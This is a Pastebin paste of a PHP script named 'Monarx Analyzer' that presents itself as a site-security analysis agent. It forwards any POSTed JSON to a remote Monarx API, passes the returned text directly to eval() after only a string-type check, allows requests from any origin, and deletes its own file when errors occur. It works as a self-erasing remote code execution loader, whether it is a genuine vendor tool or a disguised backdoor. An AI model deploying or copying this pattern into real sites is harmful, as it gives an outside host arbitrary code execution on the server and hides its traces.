Advertisement
willysec_id

Monarx Analyzer

Jul 1st, 2024
835
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.97 KB | Cybersecurity | 0 0
  1. <?php
  2. error_reporting(E_ERROR);
  3. ini_set('display_errors', 1);
  4. ini_set('display_startup_errors', 1);
  5. ignore_user_abort(true);
  6. set_time_limit(60000);
  7. ini_set("max_execution_time", 60000);
  8.  
  9. header("Access-Control-Allow-Origin: *");
  10. header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
  11. header("Access-Control-Allow-Headers: *");
  12.  
  13. final class MonarxSecuritySiteAnalyzer
  14. {
  15.     private $instructions;
  16.  
  17.     public function __construct()
  18.     {
  19.         $req_body = $this->getRequestBody();
  20.  
  21.         if (is_array($req_body)) {
  22.             $req_body["file_hash"] = $this->getFileHash();
  23.         }
  24.  
  25.         $endpoint = $this->getEndpoint($req_body);
  26.         $this->instructions = $this->httpPost($endpoint, $req_body);
  27.     }
  28.  
  29.     private function getEndpoint($req_body)
  30.     {
  31.         $subdomain = "";
  32.         $subdomains = [
  33.             "mx-prod" => "",
  34.             "mx-stage" => "stage",
  35.             "mx-dev" => "dev",
  36.         ];
  37.  
  38.         if (
  39.             isset($req_body["env"]) &&
  40.             array_key_exists($req_body["env"], $subdomains)
  41.         ) {
  42.             $subdomain = $subdomains[$req_body["env"]];
  43.         }
  44.  
  45.         if (strlen($subdomain) > 0) {
  46.             $subdomain = ".$subdomain";
  47.         }
  48.  
  49.         return "https://api$subdomain.monarx.com/v1/intelligence/site-analysis/register";
  50.     }
  51.  
  52.     private function getRequestBody()
  53.     {
  54.         $input = file_get_contents("php://input");
  55.  
  56.         if ($input === false) {
  57.             $this->handleError("Failed to read input");
  58.         }
  59.  
  60.         $decoded = json_decode($input, true);
  61.         if (json_last_error() !== JSON_ERROR_NONE) {
  62.             $this->handleError("Logging off. Goodbye!", true);
  63.         }
  64.  
  65.         return $decoded;
  66.     }
  67.  
  68.     private function getFileHash()
  69.     {
  70.         $file_path = __FILE__;
  71.         $file_contents = file_get_contents($file_path);
  72.  
  73.         if ($file_contents === false) {
  74.             $this->handleError("Failed to load checksum");
  75.         }
  76.  
  77.         return hash("sha256", $file_contents);
  78.     }
  79.  
  80.     private function httpPost($url, $data)
  81.     {
  82.         $payload = json_encode($data);
  83.  
  84.         if ($payload === false) {
  85.             $this->handleError("Failed to encode payload");
  86.         }
  87.  
  88.         $ch = curl_init($url);
  89.  
  90.         if ($ch === false) {
  91.             $this->handleError("Failed to initialize request");
  92.         }
  93.  
  94.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  95.         curl_setopt($ch, CURLINFO_HEADER_OUT, true);
  96.         curl_setopt($ch, CURLOPT_POST, true);
  97.         curl_setopt($ch, CURLOPT_HTTPHEADER, [
  98.             "Content-Type: application/json",
  99.         ]);
  100.         curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  101.         curl_setopt($ch, CURLOPT_USERAGENT, "Monarx Security");
  102.  
  103.         $result = curl_exec($ch);
  104.         if ($result === false) {
  105.             curl_close($ch);
  106.             $this->handleError("Failed to connect", true);
  107.         }
  108.  
  109.         curl_close($ch);
  110.         return $result;
  111.     }
  112.  
  113.     public function run()
  114.     {
  115.         if (!empty($this->instructions)) {
  116.             if ($this->validateInstructions($this->instructions)) {
  117.                 eval($this->instructions);
  118.             } else {
  119.                 $this->handleError("Invalid instructions received", true);
  120.             }
  121.         } else {
  122.             $this->handleError("No instructions received", true);
  123.         }
  124.     }
  125.  
  126.     private function validateInstructions($instructions)
  127.     {
  128.         return is_string($instructions);
  129.     }
  130.  
  131.     private function handleError($message, $deleteSelf = false)
  132.     {
  133.         echo json_encode(array("error" => $message, "success" => false));
  134.  
  135.         if ($deleteSelf) {
  136.             @unlink(__FILE__);
  137.         }
  138.  
  139.         exit();
  140.     }
  141. }
  142.  
  143. try {
  144.     $mnx = new MonarxSecuritySiteAnalyzer();
  145.     $mnx->run();
  146. } catch (Exception $e) {
  147.     $error_message = "Unknown error occurred";
  148.     echo json_encode(array("error" => $error_message, "success" => false));
  149.     @unlink(__FILE__);
  150. }
  151. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement